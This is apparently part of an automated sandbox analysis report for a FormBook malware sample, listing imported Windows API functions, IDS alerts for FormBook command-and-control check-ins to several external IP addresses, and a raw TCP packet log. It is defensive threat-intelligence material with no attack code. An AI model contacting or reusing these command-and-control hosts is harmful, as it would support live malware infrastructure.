                                                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishGreat Britain
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-07T15:27:11.595847+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.849704TCP
                                                                      2024-11-07T15:27:37.582756+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497103.33.130.19080TCP
                                                                      2024-11-07T15:27:37.582756+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497103.33.130.19080TCP
                                                                      2024-11-07T15:27:50.811528+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.849711TCP
                                                                      2024-11-07T15:27:53.493743+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971274.208.236.2580TCP
                                                                      2024-11-07T15:27:55.903448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971374.208.236.2580TCP
                                                                      2024-11-07T15:27:58.408291+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971474.208.236.2580TCP
                                                                      2024-11-07T15:28:00.989412+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84971574.208.236.2580TCP
                                                                      2024-11-07T15:28:00.989412+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84971574.208.236.2580TCP
                                                                      2024-11-07T15:28:06.681366+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497273.33.130.19080TCP
                                                                      2024-11-07T15:28:09.292827+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497423.33.130.19080TCP
                                                                      2024-11-07T15:28:11.773840+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497583.33.130.19080TCP
                                                                      2024-11-07T15:28:14.389343+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497753.33.130.19080TCP
                                                                      2024-11-07T15:28:14.389343+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497753.33.130.19080TCP
                                                                      2024-11-07T15:28:20.067997+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8498073.33.130.19080TCP
                                                                      2024-11-07T15:28:22.624290+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8498223.33.130.19080TCP
                                                                      2024-11-07T15:28:25.156568+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8498383.33.130.19080TCP
                                                                      2024-11-07T15:28:27.776036+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8498513.33.130.19080TCP
                                                                      2024-11-07T15:28:27.776036+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8498513.33.130.19080TCP
                                                                      2024-11-07T15:28:47.802064+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8499553.33.130.19080TCP
                                                                      2024-11-07T15:28:50.411846+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8499693.33.130.19080TCP
                                                                      2024-11-07T15:28:52.899048+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8499813.33.130.19080TCP
                                                                      2024-11-07T15:28:55.479688+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8499933.33.130.19080TCP
                                                                      2024-11-07T15:28:55.479688+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8499933.33.130.19080TCP
                                                                      2024-11-07T15:29:01.378338+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849994199.192.19.1980TCP
                                                                      2024-11-07T15:29:03.932155+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849995199.192.19.1980TCP
                                                                      2024-11-07T15:29:06.449463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849996199.192.19.1980TCP
                                                                      2024-11-07T15:29:09.004729+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849997199.192.19.1980TCP
                                                                      2024-11-07T15:29:09.004729+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849997199.192.19.1980TCP
                                                                      2024-11-07T15:29:14.989019+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849998208.91.197.2780TCP
                                                                      2024-11-07T15:29:17.523090+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849999208.91.197.2780TCP
                                                                      2024-11-07T15:29:20.065290+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.850000208.91.197.2780TCP
                                                                      2024-11-07T15:29:23.075547+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.850001208.91.197.2780TCP
                                                                      2024-11-07T15:29:23.075547+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.850001208.91.197.2780TCP
                                                                      2024-11-07T15:29:29.814343+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.850002156.242.132.8280TCP
                                                                      2024-11-07T15:29:32.709103+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.850003156.242.132.8280TCP
                                                                      2024-11-07T15:29:35.365443+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.850004156.242.132.8280TCP
                                                                      2024-11-07T15:29:44.886986+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.850005156.242.132.8280TCP
                                                                      2024-11-07T15:29:44.886986+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.850005156.242.132.8280TCP
                                                                      2024-11-07T15:29:58.903671+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.85000684.32.84.3280TCP
                                                                      2024-11-07T15:30:02.614463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.85000784.32.84.3280TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 7, 2024 15:27:36.924614906 CET4971080192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:27:36.929506063 CET80497103.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:27:36.929614067 CET4971080192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:27:36.937261105 CET4971080192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:27:36.942269087 CET80497103.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:27:37.581988096 CET80497103.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:27:37.582618952 CET80497103.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:27:37.582756042 CET4971080192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:27:37.585664034 CET4971080192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:27:37.590668917 CET80497103.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:27:52.680191040 CET4971280192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:52.685164928 CET804971274.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:52.685261011 CET4971280192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:52.695770025 CET4971280192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:52.700757027 CET804971274.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:53.493556976 CET804971274.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:53.493623018 CET804971274.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:53.493742943 CET4971280192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:53.493849039 CET804971274.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:53.493902922 CET4971280192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:54.209444046 CET4971280192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:55.228080988 CET4971380192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:55.232994080 CET804971374.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:55.233113050 CET4971380192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:55.243988991 CET4971380192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:55.248884916 CET804971374.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:55.885152102 CET804971374.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:55.903393030 CET804971374.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:55.903448105 CET4971380192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:56.756316900 CET4971380192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:57.774810076 CET4971480192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:57.779633999 CET804971474.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:57.779733896 CET4971480192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:57.790715933 CET4971480192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:57.796350002 CET804971474.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:57.796365023 CET804971474.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:58.397226095 CET804971474.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:58.408092976 CET804971474.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:27:58.408291101 CET4971480192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:27:59.303002119 CET4971480192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:28:00.321836948 CET4971580192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:28:00.326775074 CET804971574.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:28:00.326870918 CET4971580192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:28:00.333995104 CET4971580192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:28:00.338849068 CET804971574.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:28:00.977595091 CET804971574.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:28:00.989239931 CET804971574.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:28:00.989412069 CET4971580192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:28:00.990360022 CET4971580192.168.2.874.208.236.25
                                                                      Nov 7, 2024 15:28:00.995189905 CET804971574.208.236.25192.168.2.8
                                                                      Nov 7, 2024 15:28:06.040293932 CET4972780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:06.045236111 CET80497273.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:06.045331001 CET4972780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:06.056727886 CET4972780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:06.062057972 CET80497273.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:06.681296110 CET80497273.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:06.681365967 CET4972780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:07.568536997 CET4972780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:07.574039936 CET80497273.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:08.587238073 CET4974280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:08.592223883 CET80497423.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:08.592327118 CET4974280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:08.602761030 CET4974280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:08.607718945 CET80497423.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:09.292717934 CET80497423.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:09.292826891 CET4974280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:10.115457058 CET4974280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:10.121149063 CET80497423.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:11.134439945 CET4975880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:11.139575005 CET80497583.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:11.139719009 CET4975880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:11.150594950 CET4975880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:11.155594110 CET80497583.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:11.155608892 CET80497583.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:11.773744106 CET80497583.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:11.773839951 CET4975880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:12.662410975 CET4975880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:12.667247057 CET80497583.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:13.681072950 CET4977580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:13.686093092 CET80497753.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:13.686213970 CET4977580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:13.693474054 CET4977580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:13.698308945 CET80497753.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:14.356386900 CET80497753.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:14.389177084 CET80497753.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:14.389343023 CET4977580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:14.390249968 CET4977580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:14.395235062 CET80497753.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:19.426785946 CET4980780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:19.431659937 CET80498073.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:19.431761980 CET4980780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:19.442677021 CET4980780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:19.447555065 CET80498073.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:20.067858934 CET80498073.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:20.067996979 CET4980780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:20.959146023 CET4980780192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:20.964093924 CET80498073.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:21.977859974 CET4982280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:21.983985901 CET80498223.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:21.984083891 CET4982280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:21.994709969 CET4982280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:21.999627113 CET80498223.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:22.624198914 CET80498223.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:22.624289989 CET4982280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:23.506098986 CET4982280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:23.510865927 CET80498223.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:24.524873018 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:24.529762983 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:24.529875040 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:24.540694952 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:24.545723915 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:24.545737982 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:25.156512976 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:25.156568050 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:26.052872896 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:26.057718992 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.071655035 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.076504946 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.076582909 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.083715916 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.088620901 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.743560076 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.775923014 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.776036024 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.777091980 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.782174110 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:47.154922009 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:47.159895897 CET80499553.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:47.159986973 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:47.170686007 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:47.175647974 CET80499553.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:47.802010059 CET80499553.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:47.802063942 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:48.678050041 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:48.683033943 CET80499553.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:49.702297926 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:49.707134008 CET80499693.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:49.707214117 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:49.732711077 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:49.737550020 CET80499693.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:50.411787987 CET80499693.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:50.411845922 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:51.242533922 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:51.247627974 CET80499693.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.259645939 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:52.265984058 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.266052961 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:52.278417110 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:52.283416033 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.283441067 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.896075964 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.899048090 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:53.787300110 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:53.792851925 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:54.805936098 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:54.811059952 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:54.815015078 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:54.822185993 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:54.827241898 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:55.476773977 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:55.479547024 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:55.479687929 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:55.480509043 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:55.485591888 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:29:00.662404060 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:00.667334080 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:00.667419910 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:00.684931040 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:00.689893961 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378232002 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378258944 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378271103 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378278017 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378283978 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378312111 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378329039 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378338099 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.378344059 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378359079 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378367901 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.378372908 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378381014 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.378463030 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.383434057 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.383459091 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.383471012 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.383579969 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.497917891 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.498405933 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.498421907 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.498658895 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:02.193593979 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.212639093 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.218561888 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.218733072 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.230871916 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.235754013 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932053089 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932115078 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932154894 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.932164907 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932197094 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932208061 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932219982 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932230949 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932244062 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932245016 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.932259083 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932271004 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932280064 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.932303905 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.932322979 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.937340021 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.937366009 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.937376976 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.937419891 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:04.050769091 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:04.050801039 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:04.050843000 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:04.050842047 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:04.050889015 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:04.740375042 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:05.760272026 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:05.765213013 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:05.765292883 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:05.778769016 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:05.783915043 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:05.783968925 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449321032 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449357033 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449372053 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449385881 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449399948 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449412107 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449425936 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449441910 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449462891 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.449527025 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.450450897 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.450515032 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.450557947 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.454427958 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.454495907 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.454509020 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.454523087 CET8049996199.192.19.19192.168.2.8
